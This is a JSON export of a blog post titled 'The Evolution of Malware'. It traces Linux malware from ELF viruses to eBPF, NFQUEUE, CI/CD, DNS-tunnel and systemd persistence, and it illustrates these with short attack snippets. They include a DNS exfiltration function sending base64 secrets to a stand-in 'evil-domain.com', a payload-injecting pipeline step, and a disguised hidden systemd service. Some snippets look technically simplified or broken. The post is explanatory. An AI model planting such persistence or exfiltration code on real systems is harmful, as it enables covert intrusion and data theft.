{"id":781,"date":"2026-06-02T00:36:52","date_gmt":"2026-06-02T00:36:52","guid":{"rendered":"https:\/\/quantusintel.group\/osint\/blog\/2026\/06\/02\/the-evolution-of-malware\/"},"modified":"2026-06-02T00:36:52","modified_gmt":"2026-06-02T00:36:52","slug":"the-evolution-of-malware","status":"publish","type":"post","link":"https:\/\/quantusintel.group\/osint\/blog\/2026\/06\/02\/the-evolution-of-malware\/","title":{"rendered":"The Evolution of Malware"},"content":{"rendered":"<figure><img data-opt-id=771569372  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*PgYjPTjDTIjog7fDYLMhZw.png\" \/><\/figure>\n<p>The first viruses targeting ELF files (the primary format for executable files under UNIX) were first detected in the late 1990s, and their population now numbers in the hundreds.<\/p>\n<p>By default, UNIX prohibits the modification of executable files, and successful virus propagation is only possible at the root level, which is either assigned to the infected file by an administrator or seized by the virus itself through vulnerabilities in the system kernel. With the right access control policy and prompt application of patches, the threat of viral infection is minimized. And the days of widespread software sharing are long gone\u200a\u2014\u200ano one copies binaries from each other anymore, downloading everything directly from the internet. Even if a virus manages to infect the main server, it won\u2019t go beyond the first generation.<\/p>\n<p>File viruses are no longer relevant, and the absence of major outbreaks confirms this. But the accumulated methods of infiltration haven\u2019t gone anywhere\u200a\u2014\u200awithout them, the lifespan of Trojans and remote administration systems would be short. Gaining root access is just the beginning. 
A hacker needs to establish a foothold in the system, clinging to anything that moves, but even then they cannot be sure that a backup won\u2019t bury their\u00a0efforts.<\/p>\n<p>It is believed that viruses that infiltrate source code are more resilient. In reality\u200a\u2014\u200athey are not. Source code is needed by only a few, and programmers have long been using version control systems. Attempts to infect Linux and Apache source code fail spectacularly.<\/p>\n<p>The same applies to viruses in interpreted scripts\u200a\u2014\u200abash, Python, PHP, and others. Scripts are ubiquitous in UNIX; modifying them is allowed, but no one shares them. Therefore, viruses remain inside the infected computer, unable to\u00a0escape.<\/p>\n<p>Of course, a virus can spread over the Internet, but then it is no longer a virus, but a worm\u200a\u2014\u200aand that is a different story.<\/p>\n<p><strong><em>WHERE DID THE VIRUSES\u00a0GO?<\/em><\/strong><\/p>\n<p>And this is where things get really interesting. While classic ELF viruses are dying out like mammoths, their concepts live on in far more sophisticated forms. A modern attacker won\u2019t tamper with the\u00a0.text segment of a binary; instead, they\u2019ll embed themselves in the system so that while you\u2019re watching the processes, they\u2019ll be watching you right\u00a0back.<\/p>\n<p>Whereas viruses used to latch onto files, they now latch onto system behavior. For example, via eBPF\u200a\u2014\u200athat very \u201csecure\u201d mechanism that kernel marketers tout as a miracle. But give the attacker root access\u200a\u2014\u200aand they turn eBPF into the perfect post-exploitation tool: intercepting syscalls, hiding network activity, filtering logs on the\u00a0fly.<\/p>\n<p>And the funniest part is\u200a\u2014\u200aall of this happens not somewhere in the underground, but using the very same mechanisms that developers use for monitoring and debugging. 
In other words, the attacker doesn\u2019t just infiltrate the system\u200a\u2014\u200athey do it using the system\u2019s own tools. They don\u2019t break the rules of the game; they play by them, just a bit more aggressively and cleverly. And when you open `bpftool prog show`, you see exactly what they want you to see. Everything else quietly lives in the shadows of the\u00a0kernel.<\/p>\n<p>At the same time, viruses have ceased to be something that \u201csticks\u201d to a binary; they have become something that grows into the infrastructure. They embed themselves in network stacks, in pipelines, in CI\/CD, in containers, in service\u00a0meshes.<\/p>\n<p>A modern virus leaves no traces on the disk; it leaves traces in behavior: strange timings, unexpected system calls, anomalous DNS requests, processes that \u201csleep\u201d too long, and containers that \u201cdie\u201d too\u00a0quickly.<\/p>\n<p>And the worst part is\u200a\u2014\u200athe virus doesn\u2019t have to be monolithic. It can be distributed, like a cloud. One component sits in eBPF, another in NFQUEUE, a third in CI\/CD, and a fourth in the Kubernetes admission controller. Kill one\u200a\u2014\u200athe rest keep on living. This is no longer a virus in the classical sense. It\u2019s an ecosystem that uses your infrastructure as its own organism.<\/p>\n<p><strong><em>HOW IT LOOKS IN\u00a0REALITY:<\/em><\/strong><\/p>\n<p>To understand just how far modern malware has come, you only need to look at what it looks like in the code. Not in theory, but in reality\u200a\u2014\u200ain the form of small snippets that seem almost innocent but do things that would have left old ELF viruses speechless.<\/p>\n<p><strong>eBPF: Something in the Kernel<br \/><\/strong>This snippet doesn\u2019t break the system, doesn\u2019t rewrite binaries, and leaves no traces. It simply sits in a kprobe and pretends it isn\u2019t there. 
But at the same time, it neatly cuts out of the logs everything the attacker doesn\u2019t\u00a0like.<\/p>\n<pre>SEC(\"kprobe\/tcp_connect\")<br \/>int hide_connect(struct pt_regs *ctx) {<br \/>    struct sock *sk = (struct sock *)PT_REGS_PARM1(ctx);<br \/>    u16 dport = BPF_CORE_READ(sk, __sk_common.skc_dport);<br \/><br \/>    if (dport == bpf_htons(443)) {<br \/>        return 0;<br \/>    }<br \/><br \/>    return 1;<br \/>}<\/pre>\n<p><strong>NFQUEUE: A Network\u00a0Editor<\/strong><\/p>\n<p>Just one line of iptables\u200a\u2014\u200aand all outgoing HTTP traffic ends up in the hands of an attacker:<\/p>\n<pre>iptables -I OUTPUT -p tcp --dport 80 -j NFQUEUE --queue-num 666<\/pre>\n<p>And next up is a Python script that replaces the contents of packets on the\u00a0fly:<\/p>\n<pre>from netfilterqueue import NetfilterQueue<br \/>from scapy.all import *<br \/><br \/>def modify(pkt):<br \/>    sc = IP(pkt.get_payload())<br \/>    if sc.haslayer(HTTP):<br \/>        sc[HTTP].User_Agent = \"Mozilla\/5.0 (Totally Legit)\"<br \/>        del sc[IP].chksum<br \/>        del sc[TCP].chksum<br \/>        pkt.set_payload(bytes(sc))<br \/>    pkt.accept()<br \/><br \/>nfq = NetfilterQueue()<br \/>nfq.bind(666, modify)<br \/>nfq.run()<\/pre>\n<p><strong>CI\/CD: A Threat in the Supply\u00a0Chain<\/strong><\/p>\n<p>Here\u2019s what happens when an attacker gains access to your pipeline:<\/p>\n<pre>steps:<br \/>  - name: Build<br \/>    run: |<br \/>      gcc app.c -o app<br \/><br \/>  - name: Inject payload<br \/>    run: |<br \/>      echo \"malicious payload\" &gt;&gt; app<br \/><br \/>  - name: Upload artifact<br \/>    uses: actions\/upload-artifact@v3<br \/>    with:<br \/>      name: app<br \/>      path: .\/app<\/pre>\n<p>The victim downloads the \u201cvirus\u201d themselves. 
It\u2019s not a malicious file\u200a\u2014\u200ait\u2019s a malicious process.<\/p>\n<p><strong>DNS tunnel:<\/strong><\/p>\n<pre>import dns.resolver<br \/>import base64<br \/><br \/>def exfil(data):<br \/>    chunk = base64.b64encode(data.encode()).decode()<br \/>    domain = f\"{chunk}.evil-domain.com\"<br \/>    try:<br \/>        dns.resolver.resolve(domain, \"A\")<br \/>    except:<br \/>        pass<br \/><br \/>exfil(\"secret_token=12345\")<\/pre>\n<p>The antivirus detects a DNS request. Zeek detects an anomaly. And the attacker sees a communication channel.<\/p>\n<p><strong>systemd<\/strong>:<\/p>\n<pre>[Unit]<br \/>Description=systemd-tmpfiles-clean<br \/>After=network.target<br \/><br \/>[Service]<br \/>Type=simple<br \/>ExecStart=\/usr\/local\/bin\/.hidden_service<br \/>Restart=always<br \/><br \/>[Install]<br \/>WantedBy=multi-user.target<\/pre>\n<p>This is not a virus. It is a stable, persistent component that is integrated into the system and continues to function regardless of system restarts or standard maintenance procedures.<\/p>\n<p>File viruses are dead. But their spirit lives on more vividly than anything\u00a0else.<\/p>\n<p>It has simply moved\u00a0on:<\/p>\n<p>\u2014 from ELF to\u00a0eBPF,<\/p>\n<p>\u2014 from binaries to pipelines,<\/p>\n<p>\u2014 from disk to\u00a0network,<\/p>\n<p>\u2014 from the file system to behavior,<\/p>\n<p>\u2014 from local machines to the\u00a0cloud.<\/p>\n<p>A modern virus is not a\u00a0file.<\/p>\n<p>It is a system\u00a0state.<\/p>\n<p>And you don\u2019t fight it with antivirus software, but with monitoring, telemetry, behavioral analysis, supply chain control, and paranoia elevated to the level of engineering art. Because viruses haven\u2019t disappeared. 
They\u2019ve simply stopped being\u00a0files.<\/p>\n<hr \/>\n<p><a href=\"https:\/\/osintteam.blog\/the-evolution-of-malware-fa60c1984c02\">The Evolution of Malware<\/a> was originally published in <a href=\"https:\/\/osintteam.blog\/\">OSINT Team<\/a> on Medium, where people are continuing the conversation by highlighting and responding to this story.<\/p>","protected":false},"excerpt":{"rendered":"<p>The first viruses targeting ELF files (the primary format for executable files under UNIX) were first detected in the late 1990s, and their population now numbers in the hundreds. By default, UNIX prohibits the modification of executable files, and successful virus propagation is only possible at the root level, which is either assigned to the &#8230; <a title=\"The Evolution of Malware\" class=\"read-more\" href=\"https:\/\/quantusintel.group\/osint\/blog\/2026\/06\/02\/the-evolution-of-malware\/\" aria-label=\"Read more about The Evolution of Malware\">Read 
more<\/a><\/p>\n","protected":false},"author":1,"featured_media":782,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-781","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/781","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/comments?post=781"}],"version-history":[{"count":0,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/781\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media\/782"}],"wp:attachment":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media?parent=781"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/categories?post=781"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/tags?post=781"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}